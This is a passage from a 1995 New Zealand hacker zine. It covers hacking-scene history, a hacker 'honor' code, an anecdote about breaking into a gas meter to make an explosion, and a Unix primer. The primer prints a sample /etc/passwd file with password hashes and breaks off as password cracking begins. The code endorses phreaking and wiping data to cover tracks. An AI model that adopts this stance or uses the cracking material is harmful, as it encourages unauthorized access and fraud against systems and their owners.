home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / zines / n_z / sli4.txt < prev    next >
Encoding:
Text File  |  2003-06-11  |  107.5 KB  |  2,760 lines

  1.  
  2.                                                            [ 01/04/95  SLi]
  3.  
  4.  
  5.  
  6.  
  7.  
  8.  
  9.                                    SLi
  10.  
  11.                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  12.                 ^^^^^                                ^^^^^
  13.               ^^^^^              Welcome               ^^^^^
  14.                 ^^^^^                                ^^^^^
  15.                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  16.  
  17.                              Southern Lights
  18.                                    inc.
  19.  
  20.  
  21.  
  22.  
  23.  
  24.           Well, amazing!  SLi IV.  Let's see if we can keep this up.
  25.           If you want a letter to the editor or something like that
  26.           in here, send it (or any comments, etc.. ) to:
  27.  
  28.  
  29.             SLi
  30.             PO Box 3030
  31.             Onekawa
  32.             Napier
  33.             New Zealand
  34.  
  35.           OR
  36.  
  37.             Internet E-mail Address:
  38.             HACKER_M@IX.WCC.GOVT.NZ
  39.  
  40.           OR
  41.  
  42.              Call SLi BBS if you can find where it is
  43.  
  44.  
  45.           Please read SLi I, II & III if you have trouble with
  46.           any terms in this mag.
  47.  
  48.           SLi mag written by New Zealanders for New Zealanders!
  49.  
  50.           Oh, before I forget, we have a NEW editor (I'm still here tho').
  51.           CyntaxEra is now a Co-Editor and designer of the mag.  It's
  52.           outlay and overall presentation is her domain, well unless I
  53.           get bossy.
  54.  
  55.  
  56.  
  57. ^L
  58.                                                               [ 01/04/95  SLi]
  59.  
  60.  
  61.  
  62.  
  63.  
  64.  
  65.  
  66.                             I N D E X
  67.                             ---------
  68.  
  69.  
  70.  
  71.  
  72.         Welcome ........................... Eon
  73.         The Rules ......................... Eon
  74.         Aunty Cyntax'Z Nutty noteZ ........ CyntaxEra
  75.         The Police ........................ Eon
  76.         Time Line ......................... Eon
  77.         Books 2 Read ...................... SLi
  78.         [In]Famous Quotes ................. Eon
  79.         Honour ............................ Eon
  80.         Unix .............................. Compiled by Eon
  81.         Busted 4 Nothing .................. Eon/Cyntaxera
  82.         The SLi Archive Subject list ...... Eon
  83.         Fake Mail ......................... Eon
  84.         Elements of Data Deprotection ..... Thorium
  85.         Review: 'ToT' ..................... CyntaxEra
  86.         SLi ............................... Eon
  87.         COCOT Phreaking in NZ ............. CyntaxEra
  88.         SmYte List ........................ SLi
  89.         Editors Knotez .................... Eon
  90.  
  91.  
  92. ^L
  93.  
  94.  
  95.                                    SLi
  96.  
  97.                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  98.                 ^^^^^                                ^^^^^
  99.               ^^^^^             The Rules              ^^^^^
  100.                 ^^^^^                                ^^^^^
  101.                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  102.  
  103.                              Southern Lights
  104.                                    inc.
  105.  
  106.  
  107.  
  108.  
  109.  Okay, here are the rules for the SLi mag.
  110.  
  111.  
  112.         The entire mag is (C)opyright 1995 SLi
  113.  
  114.  
  115.                                   (1)
  116.  
  117.  If you are working for a business that has some interest in the information
  118.  contained in this mag, you must send WRITTEN notification that you are in
  119.  possession of this [or any of the other SLi mags] to the following address:
  120.  
  121.  
  122.    SLi-Comp
  123.    PO Box 3030
  124.    Onekawa
  125.    Napier
  126.    New Zealand
  127.  
  128.  
  129.  Enclose your name, your company's name, address, and phone/fax number.
  130.  
  131.  If you send an IBM formatted 720 disk and a SASE, we will send you the next
  132.  SLi mag.  A donation of $5 is asked for however - as YOU can aford it (unlike
  133.  SOME of our readers).
  134.  
  135.  
  136.                                  (2)
  137.  
  138.  This mag may not be edited, and no SINGULAR part may be quoted in any way!
  139.  However, the ENTIRE mag may be reproduced, but a charge of $1000 NZ will be
  140.  expected to be paid to the following address BEFORE any such reproduction.
  141.  
  142.  
  143.    SLi-Payment
  144.    PO Box 3030
  145.    Onekawa
  146.    Napier
  147.    New Zealand
  148.  
  149.  Enclose your name, your company's name, address, and phone/fax number.
  150.  
  151.  The fee must be paid in $CASH$.  I, the editor, reserve the right
  152.  to revoke your rights to reproduce this mag at ANY time.
  153.  
  154.  You may, if you are NOT a company, business or in anyway connected to law
  155.  enforcement or Telecom Security/Risk Management, produce ONLY TWO hard-copies
  156.  for no charge.
  157.  
  158.  
  159.  
  160.                                    SLi
  161.  
  162.                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  163.                 ^^^^^                                ^^^^^
  164.               ^^^^^     Aunty Cyntax'Z Nutty noteZ      ^^^^^
  165.                 ^^^^^                                ^^^^^
  166.                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  167.  
  168.                              Southern Lights
  169.                                    inc.
  170.  
  171.  
  172. 'lo out there yet again.. I can't believe it.. already issue #4.. Quite amazed
  173. we've managed to get out another issue before anything drastic had happened
  174. to restrict our printing, but even so, tough.
  175.  
  176. Well, anyhowz, I guess I'll do some greetz (considering I didn't do any in the
  177. last issue..)..
  178.  
  179. Greetz go out to: [in absolutely NO order at all..]
  180.  
  181. SCoJaCK, Shatter, LexicnDvl, BooYaa [Sorry 'bout not contributing anyfink to
  182. WPoS yet, but I've been a bit busy wif SLi stuff.. will get 'round to it if you
  183. still want summink.. ;)], Tele [how's the bf/husband? ;)], max-q, ChezeHead,
  184. motley, t00ph [sL0ppY or whatever you're callin' y'self now], Hellfire, D-FENS,
  185. DTangent, GreYLocK, eck, Baccahbar, Wacko, PurpCon, noise, SSerpent, Serpent,
  186. UtahSaint, phigan, JuLieT, Mindscrew, Solctice, Speed_Rcr, Hypnosis, wr, SsX,
  187. UnderDeaD, HomeySan, hotrod, pyr0tech, Gen-X, Harl, kluge, Radikahl, Velcro,
  188. qwiksilver, Datarape, TimeLord, Cellphone, neophyte, Snidely, 7up, Zibby -
  189. (where the hell are you?), Thorium, XANTh, WiRED, Nitro-187, xn4rk, zaph0d,
  190. Lestat, Visionary [Pat], DrMenace, GAnarchy, Freiheit, Opp, erikt.
  191.  
  192. [..and the rest of you hack/phreak guys/gals!  Couldn't list y'all.. sorry
  193.  - maybe all that p0t actually HAS gone to my head.. ugh. ;)]
  194.  
  195. Sooo, any gossip this time 'round?  Not really.  *yawn* Very quiet lately which
  196. means that there isn't much to talk about.. oh yeah...
  197.  
  198. CyntaxEra + R-A-D = eX-poTheaDz... *sigh* well... for a while anywayz.. =)
  199.  
  200. Doesn't that show how little there is to say this time round?!  Uh, I guess
  201. I could beg and plead for pieces of gossip to head our way (yup, even BBS ads
  202. will be accepted.. I guess.. hmm.. maybe we'll add a special column for 'em..
  203. Well, if there's enuf submitted, that is..)..
  204.  
  205. Hopefully, you guyz at ToT didn't get offended by my review - I tried to be as
  206. HONEST as I could be without being TOO cutting (I got told I was a little harsh
  207. with the comments, but I felt that they were appropriate - it's only an opinion
  208. so don't take it personally.. =) ).  Well, to you other readerz out there who
  209. aren't in ToT, give it a read - you may find it amusing.. =)
  210.  
  211. Oh, it's a pity that I've been informed that ToT#2 was going to be the last
  212. issue - it had promise [*flashbacks to SLi Issue #1 and remembers that we
  213. hadn't really started out TOO magnificently*  Mind you... it was a start].
  214.  
  215. Telco seems to be backing down for a bit, but that doesn't mean that they've
  216. stopped 'investigating' 'n' stuff, but at least they're giving us a break! =)
  217.  
  218.   [Ed's Note: Actually Cyntax, Heather is too busy to work on that, so she
  219.               says.  She's a nice woman - just a bit slY <excuse the pun>
  220.               WELL [NEW INFO JUST ADDED] Maybe she's nice but the BOSS dude
  221.               ISNT.  He's a LAMER!  Cutting off poor Cyntax's 3-way GRRRR]
  222.  
  223. Special note to "THE FLY" - You've pissed me off once too often, and after
  224. hearing of your comments, you'll get what's coming for you.  Oh, and I'm sure
  225. you enjoyed the "$2,000 phone call" from AT&T - so I was informed.  They were
  226. doing a bit of a crackdown on fone-phreaks and your name popped up somehow.
  227. Pity they're too far away to seriously do something about it - don't think
  228. they could be bothered, huh?
  229.  
  230.  
  231. That's about it from me.. for now
  232.  
  233. 'Till next issue (well, next article anyway.. ;) )... over and OUT.
  234.  
  235.  
  236.  
  237.                                    SLi
  238.  
  239.                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  240.                 ^^^^^                                ^^^^^
  241.               ^^^^^             The Police             ^^^^^
  242.                 ^^^^^                                ^^^^^
  243.                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  244.  
  245.                              Southern Lights
  246.                                    inc.
  247.  
  248.  
  249.  
  250.  -The Police-
  251.  
  252.  
  253.  Ahh, now, this is a laugh and it was VERY boring, but here goes anyway...
  254.  
  255.  
  256.  We ALL know police, dont we?  Now, I thought that police were there to pro-
  257.  tect, BUT....
  258.  
  259.  It all happened one EARLY morning - about 5am.  We were, uh, well, breaking
  260.  into a gas-meter to get some gas to fill a rubbish bag with to make a bit of
  261.  a large explosion somewhere in the metropoliton area.  Now, sadly :( me and
  262.  another individual were smacking the shit outta this gas meter's pipes and
  263.  we hear a car driving towards where we were.  We [by the way, we were in a
  264.  car - not at that moment, obviously] dropped the crowbar [thats what we were
  265.  talking to the gas-meter with] and hid behind the car.
  266.  
  267.  Unfortunatly, the police had seen us, so I [holdin' a spanner] tried to look
  268.  like we were undoing the wheel [There was a stone in it.  Well, that was the
  269.  story anyway].  Now, the cops asked us questions, searched our car for drugs
  270.  and basicly  harrassed us until EXACTLY 6:30am [it mighta been 5:30am].
  271.  Anyway, I was informed that that is the EXACT time the police go home, so all
  272.  we were was a 'time-waster'.
  273.  
  274.  I must admit that I have lost some respect I had for the boys/'girl-boys' in
  275.  blue.  The car-driver's mom got called and he got in shit.  We had to walk
  276.  back and pick up the crowbar we had left 'hidden in plain sight' - they some-
  277.  how managed to miss it - and basically, we had a really bad day [morning]...
  278.  
  279.  BTW - Cops ask really STUPID questions!
  280.  
  281.  
  282.        Cop:    Why is there broken glass near that car??
  283.  
  284.         Me:    I dunno, but if you were a _real_ detective, you would notice
  285.                that the broken glass is nowhere near the broken window.
  286.                Obviously the car has been moved since the glass was broken so
  287.                we CAN'T have done it.
  288.  
  289.  
  290.        Cop:    You ever had a run in with us before?
  291.  
  292.         Me:       [thinking]
  293.                What a fucking stupid question to ask!  I told you my name so
  294.                why don't you just look it up?
  295.                   [saying]
  296.                Just the usual - being out late and getting stopped.  Nothing
  297.                really.
  298.  
  299.  
  300.   Cop from
  301. Vice squad:    Been smoking any dak? [dak = pot/green plant/cannibis          ]
  302.  
  303.   A friend:    I wish.
  304.  
  305.  
  306.  
  307.  Well, I have no problems with police, except that _SOME_ policewomen have a
  308.  really bad attitude and that some policemen thing that they are god's gift
  309.  to the world.  But, the police do a job that MUST be done.  I salute them
  310.  for it...  BUT,  Mr/Ms Police Officer, take my advice and do what is right-
  311.  eous and just not necessarally what is legal.
  312.  
  313.  
  314.  
  315.                                    SLi
  316.  
  317.                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  318.                 ^^^^^                                ^^^^^
  319.               ^^^^^             TIME LINE              ^^^^^
  320.                 ^^^^^                                ^^^^^
  321.                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  322.  
  323.                              Southern Lights
  324.                                    inc.
  325.  
  326.  
  327.  
  328.     Well, here we have it.  A timeline of events in the H/P world.
  329.     Now, I might have screwed up a few things so please no mail bombs
  330.     and bear with me.
  331.  
  332.  
  333. Information and Dates have been taken from:
  334.  
  335.  
  336.  "The Hacker Crackdown"       ----  Bruce Sterling
  337.  
  338.  "THEFT OF COMPUTER SOFTWARE  ____  William J. Cook,
  339.  A NATIONAL SECURITY THREAT"        Assistant U.S. Attorney
  340.  
  341.  PGP DOX                      ----  Author Unknown at time of
  342.                                     Publication.
  343.  "The History of LOD/H        ____
  344.  Revision #3 May 1990"              Lex Luthor
  345.  
  346.  U.S. Newswire                ----  Author Unknown at time of
  347.  Articles                           Publication.
  348.  
  349.  News Artical                 ____  Barbara E. McMullen and
  350.  Pump-Con Bust                      John F. McMullen
  351.                                     -03/11/1992-
  352.  
  353.  
  354.  and finally, my own knowlege.
  355.  
  356.  
  357.  
  358. KEY:
  359.  
  360.    Okay, the only major thing I should explain is, the use of
  361.    "Sometime." and "Sometime?".  A question mark means I'm not sure
  362.    WHEN it happened in that year.  A "." means I'm not sure of which
  363.    month things happened, but it was in this order.
  364.  
  365.  
  366.  
  367.                          -=[ Our History ]=-
  368.  
  369.  
  370.  
  371. 1865:
  372.                         U.S. Secret Service (USSS) founded.
  373.  
  374. 1876:
  375.                         Alexander Graham Bell invents telephone.
  376.  
  377. 1878:
  378.                         First teenage males flung off phone system by enraged
  379.                         authorities.
  380.  
  381. 1939:
  382.                         "Futurian" science-fiction group raided by Secret
  383.                          Service.
  384.  
  385. 1971:
  386.                         Yippie phone phreaks start YIPL/TAP magazine.
  387.  
  388. 1972:
  389.                         *Ramparts* magazine seized in blue-box rip-off
  390.                         scandal.
  391.  
  392. 1978:
  393.                         Ward Christenson and Randy Suess create first
  394.                         personal computer bulletin board system.
  395.  
  396. 1982:
  397.                         William Gibson coins term "cyberspace."
  398.  
  399. 1982:
  400.                         "414 Gang"  raided.
  401.  
  402. 1983-1984:
  403.                         AT&T dismantled in divestiture.
  404.  
  405. 1984:
  406.                         Congress passes Comprehensive Crime Control Act
  407.                         giving USSS jurisdiction over credit card fraud and
  408.                         computer fraud.
  409.  
  410. 1984:
  411.                         the U.S. Department of Commerce placed expanded export
  412.                         controls on computer software as part of its general
  413.                         protection of technical data deemed vital to the
  414.                         national defense and security of the United States.
  415.  
  416. 1984:
  417.                        "Legion of Doom" formed.
  418.  
  419.              January.   "PLOVERNET" went online. [A H/P BBS]
  420.  
  421.             Sometime?   "LOD BBS" goes online.
  422.  
  423.             Sometime?   Groups such as "Fargo 4A" and "Knights of Shadow"
  424.                         form.
  425.  
  426.        Sometime May?.   "KOS" breaks up.
  427.  
  428. 1984:
  429.                        *2600:  The Hacker Quarterly* founded.
  430.  
  431. 1984:
  432.                        *Whole Earth Software Catalog* published.
  433.  
  434. 1985:
  435.                         First police "sting" bulletin board systems
  436.                         established.
  437.  
  438. 1985:
  439.                         Whole Earth eLectronic Link computer conference (WELL)
  440.                         goes on-line.
  441.  
  442. 1986:
  443.                         Computer Fraud and Abuse Act passed in USA.
  444.  
  445. 1986:
  446.                         Electronic Communications Privacy Act passed in US.
  447.  
  448. 1987:
  449.                         Chicago prosecutors form Computer Fraud and Abuse
  450.                         Task Force.
  451.  
  452.        July/September.  A Chicago youth attacked AT&T computers at Bell Labs
  453.                         in Illinois and New Jersey, at a NATO missile support
  454.                         site in North Carolina, and at Robbins Air Force Base.
  455.  
  456. 1988:
  457.  
  458.                  July.  Secret Service covertly videotapes "SummerCon" hacker
  459.                         convention.
  460.  
  461.             September.  "Prophet" cracks BellSouth AIMSX computer network and
  462.                         downloads E911 Document to his own computer and to
  463.                         Jolnet.
  464.  
  465.             September.  AT&T Corporate Information Security informed of
  466.                         Prophet's action.
  467.  
  468.               October.  Bellcore Security informed of Prophet's action.
  469.  
  470.               October.  Scotland Yard arrested an English attacker who had
  471.                         broken into over 200 military, corporate, and
  472.                         university computers in the United States and Europe.
  473.  
  474.            November 2.  A college undergraduate planted a computer virus that
  475.                         temporarily disabled 6,000 computers on the Internet
  476.                         [* The Internet Worm *]
  477.  
  478.              December.  A search warrant filed by U.S. Customs agents in
  479.                         Chicago disclosed that a confederate of the Yugoslav
  480.                         Consul-General in Chicago was using a hacker to attack
  481.                         defense contractors by remote access in order to steal
  482.                         computerized information.  According to the affidavit,
  483.                         the information obtained by the hacker was
  484.                         subsequently smuggled out of the United States in
  485.                         diplomatic pouches with the help of the Counsel-
  486.                         General.
  487.  
  488. 1989:
  489.  
  490.               January.  Prophet uploads E911 Document to Knight Lightning.
  491.  
  492.           February 25.  Knight Lightning publishes E911 Document in *Phrack*
  493.                         electronic newsletter.
  494.  
  495.                 March.  It was disclosed that West German hackers sponsored
  496.                         by Eastern Bloc intelligence agencies had been
  497.                         systematically searching for classified information
  498.                         on Government computers throughout the United States
  499.                         through a weakness in a computer network at a
  500.                         California university.
  501.                         [* Pengo and Operation Equilizer *]
  502.  
  503.                 March.  A member of the Soviet military mission in Washington,
  504.                         DC, was arrested and expelled from the United States
  505.                         for attempting to obtain technical information about
  506.                         how U.S. Government classified information is secured
  507.                         in computers.
  508.  
  509.                 April.  Canada expelled 19 Soviet diplomats for wide-ranging
  510.                         espionage operations to obtain Canadian defense
  511.                         contractor information for military and commercial
  512.                         purposes.
  513.  
  514.                   May.  Chicago Task Force raids and arrests "Kyrie."
  515.  
  516.                  June.  "NuPrometheus League" distributes Apple Computer
  517.                         proprietary software.
  518.  
  519.               June 13.  Florida probation office crossed with phone-sex line in
  520.                         switching-station stunt.
  521.  
  522.                  July.  "Fry Guy" raided by USSS and Chicago Computer Fraud
  523.                         and Abuse Task Force.  July.  Secret Service raids
  524.                         "Prophet," "Leftist," and "Urvile" in Georgia.
  525.  
  526. 1990:
  527.  
  528.              Sometime?  PGP (Pretty Good(tm) Privacy) created by
  529.                         Philip Zimmermann.
  530.  
  531.            January 15.  Martin Luther King Day Crash strikes AT&T
  532.                         long-distance network nationwide.
  533.  
  534.         January 18-19.  Chicago Task Force raids Knight Lightning in
  535.                         St. Louis.
  536.  
  537.            January 24.  USSS and New York State Police raid "Phiber Optik,"
  538.                         "Acid Phreak," and "Scorpion" in New York City.
  539.  
  540.            February 1.  USSS raids "Terminus" in Maryland.
  541.  
  542.            February 3.  Chicago Task Force raids Richard Andrews' home.
  543.  
  544.            February 6.  Chicago Task Force raids Richard Andrews' business.
  545.  
  546.            February 6.  USSS arrests Terminus, Prophet, Leftist, and Urvile.
  547.  
  548.            February 9.  Chicago Task Force arrests Knight Lightning.
  549.  
  550.           February 20.  AT&T Security shuts down public-access "attctc"
  551.                         computer in Dallas.
  552.  
  553.           February 21.  Chicago Task Force raids Robert Izenberg in Austin.
  554.  
  555.               March 1.  Chicago Task Force raids Steve Jackson Games, Inc.,
  556.                        "Mentor," and "Erik Bloodaxe" in Austin.
  557.  
  558.             May 7,8,9.  USSS and Arizona Organized Crime and Racketeering
  559.                         Bureau conduct "Operation Sundevil" raids in
  560.                         Cincinnatti, Detroit, Los Angeles, Miami, Newark,
  561.                         Phoenix, Pittsburgh, Richmond, Tucson, San Diego,
  562.                         San Jose, and San Francisco.
  563.  
  564.                   May.  FBI interviews John Perry Barlow re NuPrometheus case.
  565.  
  566.             June/July.  Mitch Kapor and Barlow found Electronic Frontier
  567.                         Foundation;  Barlow publishes *Crime and Puzzlement*
  568.                         manifesto. [*The official EFF "about.eff" says
  569.                         EFF founded in July*]
  570.  
  571.               July 10.  Members in LOD pleed guilty
  572.  
  573.            July 24-27.  Trial of Knight Lightning.
  574.  
  575. 1991:
  576.  
  577.             Sometime?   US Senate Bill 266, a omnibus anti-crime bill,
  578.                         had an unsettling measure buried in it.
  579.                         If this non-binding resolution had become real
  580.                         law, it would have forced manufacturers of secure
  581.                         communications equipment to insert special "trap
  582.                         doors" in their products, so that the US Government
  583.                         can read anyone's encrypted messages.
  584.                         This measure was defeated after rigorous protest from
  585.                         civil libertarians and industry groups.
  586.  
  587.           March 25-28.  Computers, Freedom and Privacy conference in San
  588.                         Francisco.
  589.  
  590.                 May 1.  Electronic Frontier Foundation, Steve Jackson, and
  591.                         others file suit against members of Chicago Task
  592.                         Force.
  593.  
  594.              July 1-2.  Switching station phone software crash affects
  595.                         Washington, Los Angeles, Pittsburgh, San Francisco.
  596.  
  597.                July 8.  MOD indictment's filed aganced MOD members Julio
  598.                         Fernandez, aka. "Outlaw," John Lee, aka. "Corrupt,"
  599.                         Mark Abene,  aka. "Phiber Optik," Elias Ladopoulos,
  600.                         aka. "Acid Phreak," and Paul Stira, aka. "Scorpion,"
  601.  
  602.              February.  CPSR Roundtable in Washington, D.C.
  603.  
  604.          September 17.  AT&T phone crash affects New York City and three
  605.                         airports.
  606.  
  607. 1992:
  608.             Sometime?   FBI Digital Telephony wiretap proposal was introduced
  609.                         to Congress.  It would require all manufacturers of
  610.                         communications equipment to build in special remote
  611.                         wiretap ports that would enable the FBI to remotely
  612.                         wiretap all forms of electronic communication from FBI
  613.                         offices.
  614.  
  615.             March 11.   New York Police Department has announced the arrest of
  616.                         Randy P. Sigman, 40; Ronald G. Pinz, Jr, 21; and Byron
  617.                         J. Woodard, 18 for the alleged crimes of Unauthorized
  618.                         Use Of A computer and Attempted Computer Trespass,
  619.                         both misdemeanors.  Also arrested was Jason A. Brittain
  620.                         22 in satisfaction of a State of Arizona Fugitive From
  621.                         Justice warrant. The arrests took place in the midst
  622.                         of "PumpCon".
  623.  
  624. 1993:
  625.              Sometime.  SLi BBS goes up in NZ.
  626.  
  627.              March 21.  SLi gets national TV coverage from TVNZ.
  628.  
  629.            April 16th.  US Government-built encryption device, called the
  630.                         "Clipper" chip, containing a new classified NSA
  631.                         encryption algorithm.  The Government is encouraging
  632.                         private industry to design it into all their secure
  633.                         communication products. The catch:  At the time of
  634.                         manufacture, each Clipper chip will be loaded
  635.                         with its own unique key, and the Government gets to
  636.                         keep a copy.
  637.  
  638.                  June.  DC busts - A 2600 meeting is broken up by mall cops
  639.                         and police.
  640.  
  641. 1994:
  642.                 March.  TNO [The New Order] gets busted; Flatline BBS is
  643.                         raided.
  644.  
  645.              Sometime.  Unlucky person nailed in Auckland, NZ, for around
  646.                         $250,000 of fone fraud concerning NZ Telecom
  647.                         ($200,000) and AT&T ($40,000).
  648.  
  649.              Sometime.  Phreak in Wellington busted for beige boxing by
  650.                         Clear Communications, NZ.
  651.  
  652.              Sometime.  Big Calling Card investigation in NZ - "Motley" in
  653.                         Sweeden is busted in conjunction with CC'z - no major
  654.                         charges are laid.
  655.  
  656.               June 10.  "Deathstar" gets busted - no charges laid.
  657.  
  658.              August 6.  "Tooph" makes front page news with his alliance conf
  659.                         calls - One was a call to NZ for 293 mins costing
  660.                         $306.
  661.  
  662.              Sometime.  "MrPurple" busted for US$40,000 worth of conference
  663.                         charges. [* At time of publication, in jail =( *]
  664.  
  665.          Late/Early95.  NZ Telecom hassles Wellington phreaks about VMB
  666.                         hacking. [how lame!].
  667.  
  668. 1995:
  669.               January.  Wellington H/P'ers hunted down by Victoria University
  670.                         (with a little help from local cops) 'cos someone got
  671.                         'OPERATOR' on their boxes.
  672.                         [Yeah, wasn't 'root' but it scared 'em enuf!]
  673.  
  674.            Febuary 17.  Hacker Busted in USA for 20.000 credit cards
  675.                         Kevin Mitnick aka Condor
  676.  
  677.              March 22.  S.A.M.S.O.N meeting in Wellington, New Zealand
  678.                         "1. To identify interested parties in joining our
  679.                             proposed organisation - namely SAMSON - Software
  680.                             and Modem System Operators Network!
  681.                          2. To establish and agree on a formal code of ethical
  682.                             practices for the successful running of a public
  683.                             BBS." [* well they will wanna shut me down, wont
  684.                             they! :P *]
  685.  
  686.  
  687.  -eof-
  688.  
  689.  
  690.  
  691.  
  692.                                    SLi
  693.  
  694.                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  695.                 ^^^^^                                ^^^^^
  696.               ^^^^^          [In]Famous Quotes         ^^^^^
  697.                 ^^^^^                                ^^^^^
  698.                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  699.  
  700.                              Southern Lights
  701.                                    inc.
  702.  
  703.  
  704.       ----Eon,---Grasshopper-+-others---in--a---car----
  705.       Eon:         "Let's go crash some place."
  706.       Grasshopper: "I hope you meant as in sleeping."
  707.  
  708.  
  709.       Grasshopper: "He's `Joe-average'"
  710.       Eon:         "He's `Joe-BELOW average'"
  711.  
  712.  
  713.       George:      "I'll lock you out of my Bulletin Board and give you twit
  714.                    access forever! Ahh ahahahaha!" [spoken in a voice like he
  715.                                       had an award winning carrot up his ass]
  716.  
  717.  
  718.       Cardinal:    "Dial '111' and make a cop come."
  719.  
  720.  
  721.  
  722.  
  723.  
  724.                                    SLi
  725.  
  726.                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  727.                 ^^^^^                                ^^^^^
  728.               ^^^^^               Honor                ^^^^^
  729.                 ^^^^^                                ^^^^^
  730.                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  731.  
  732.                              Southern Lights
  733.                                    inc.
  734.  
  735.  
  736.  
  737. Honor.
  738.  
  739. For a hacker to justify his/her actions, he/she must have a guideline of rules
  740. of morals - a sense of honour.  Some do, some dont, but I hope to show you
  741. what Hack/Phreak people's ethics should be, in my opinion.
  742.  
  743.  
  744. 1.   For a start, injuring a single person;
  745.  
  746.        CC abuse is wrong.  It is not ethical.  Our fight is not against the
  747.        little man or woman - our fight is against the profiteering companies
  748.        and hiracial[sp?] government departments.  We do not steal from the
  749.        poor, and the helpless, and in a sense, that is what CC fraud is most
  750.        of the time.  Sure, occasionally you get some rich guy with 40 grand
  751.        in his account, but those times are few and in between.  Basically CC
  752.        fraud is out.
  753.  
  754.        <Of course, if a company is "lame" enough to accept a checksum's cre-
  755.        dit card - it's up to you!>
  756.  
  757.        Beige boxing is out also, unless you're phreaking from an embassy,
  758.        government department or Telecom [AT&T, Telco.. etc...] phone box.
  759.  
  760. 2.   You're not a anarchist [in the explosive terms].  It only gives us a bad
  761.      name.
  762.  
  763. 3.   Destroying data, except for covering your tracks, is out.
  764.  
  765. 4.   Your world is that of the computer and the phone.  Our world is safe
  766.      from the problems of racial prejudice, sexual descrimination, descrim-
  767.      inate by what someone says - not what they look like, sound like, or
  768.      what there beliefs are.
  769.  
  770. 5.   Our word of honour is PERMANENT.  If given, NEVER break it.  If you do,
  771.      you are no more worthy of your position in society as a murderer or a
  772.      rapist.
  773.  
  774. 6.   Respect all others' points of view - even if it is foolish.
  775.  
  776. 7.   NEVER attack anything if it hasn't done anything to you.
  777.      [Hmm, does that include kicking poor, little, defenseless PUPPIES!?]
  778.  
  779. 8.   Don't talk behind others' backs.  If you want to say something, say it to
  780.      their face.  Only dishonourable people dont tell people what they think,
  781.      but tell others instead. <maybe I should take notice of this one!>
  782.  
  783.  
  784. Remember, our war is the war that will shape the future.  If we are not
  785. ever diligent, we will lose our rights as an individual - we will become
  786. nothing more than a number.  Governments love numbers, as do all money
  787. making companies.  Protect the little free speech and the few rights we
  788. have left.  Protect them well, my brethren, for we will need it one day
  789. more than we will need anything else.
  790.  
  791. Above all, our war is directed at big businesses and governments, not towards
  792. random people in our streets.
  793.  
  794.  
  795.  
  796.  Eon.
  797.  
  798.  
  799.  
  800.  
  801.                                    SLi
  802.  
  803.                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  804.                 ^^^^^                                ^^^^^
  805.               ^^^^^               UNIX                 ^^^^^
  806.                 ^^^^^                                ^^^^^
  807.                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  808.  
  809.                              Southern Lights
  810.                                    inc.
  811.  
  812.  
  813.  
  814. UNIX is an OS used by "ALL SMART people" - I'm biest[sp?].  80* processors
  815. can use it, although 8088's will have to use a UNIX-like OS - not a UNIX OS
  816. but 486's, 386's, Pentiums, and the like, can run it.  SUN box's and VAX's
  817. can run it.  In fact, that's the amazing thing about Unix - it's PORTABLE!
  818.  
  819. Anyway, away from the dribble.
  820.  
  821. I guess I'll start at the top.
  822.  
  823.  
  824. Basic UNIX username/password prompt:
  825.  
  826. login:
  827. Password:
  828.  
  829.  
  830. This CAN be changed.  After all, with UNIX, you get the source to everything.
  831.  
  832. One good thing with UNIX is that the password file is globally readable unless
  833. the system administrator has enabled a shadow password system - not standard
  834. with unix.  The passwords are in:
  835.  
  836. /etc/passwd
  837.  
  838. Mind you this can be changed also.  After all, with UNIX, you get the source
  839. to everything.
  840.  
  841.  
  842. A UNIX passwd file looks like this:
  843.  
  844. root:FO0Cj1eXP1So.:0:20:The Superuser:/root:/bin/tcsh
  845. jones:wS31XtSkN8H0.:1023:20:Eric Jones,cb234,,:/u/staff/jones:/bin/tcsh
  846. peter:4gjxaKBycRUjE:1024:20:Peter Hall,,,:/u/staff/peter:/bin/tcsh
  847. jmm:0PmsQGJvUVvfQ:1025:20:Joe Morris,,,:/u/staff/jmm:/usr/sbin/suspended
  848. bmckenna:GIP1BJAf83Oi6:1029:20:Bill McKenna,,,:/u/others/bmckenna:/bin/tcsh
  849. jonathan:3.A8QX3BfCdm6:1030:23:Jonathan Stone,,,:/u/others/jonathan:/bin/tcsh
  850. mike:zMS3vvmSnn0bc:1033:20:Mike Doyle,CC404,8874,:/u/staff/mike:/bin/tcsh
  851. paula:s4drmoa6xnJPI:1036:23:Paula Hine,,,:/u/others/paula:/bin/passwd
  852. anthea:Slq/SPUf75UK2:1038:23:Anthea Grob,,,:/u/others/anthea:/bin/passwd
  853. ladner:zUAhxM/sSqKbY:1045:20:Richard Ladner,cb207,,:/u/others/ladner:/bin/tcsh
  854. user:PeqTb4v4Cc1Ak:1050:23:Temporary Guest Account,,,:/u/others/user:/bin/tcsh
  855. andreae:uLUDo39sS3QmE:1052:23:Andreae Family:/u/others/andreae:/bin/tcsh
  856.  
  857.  
  858. The layout may differ from UNIX's, but this is the standard layout:
  859.  
  860. Username:Password:UserID:GroupID:InfoOnUser:UsersHomeDir:User'sShell
  861.  
  862.  
  863. You will notice that the second field is the password one.  UNIX uses a one-
  864. way password encryption system.  When you login, and type your password, it
  865. encrypts your input and compares the users password field to what you entered.
  866. If it is the same, you've got the password right.
  867.  
  868. Say you want to crack the passwords.  You have to do the same.  Encrypt a se-
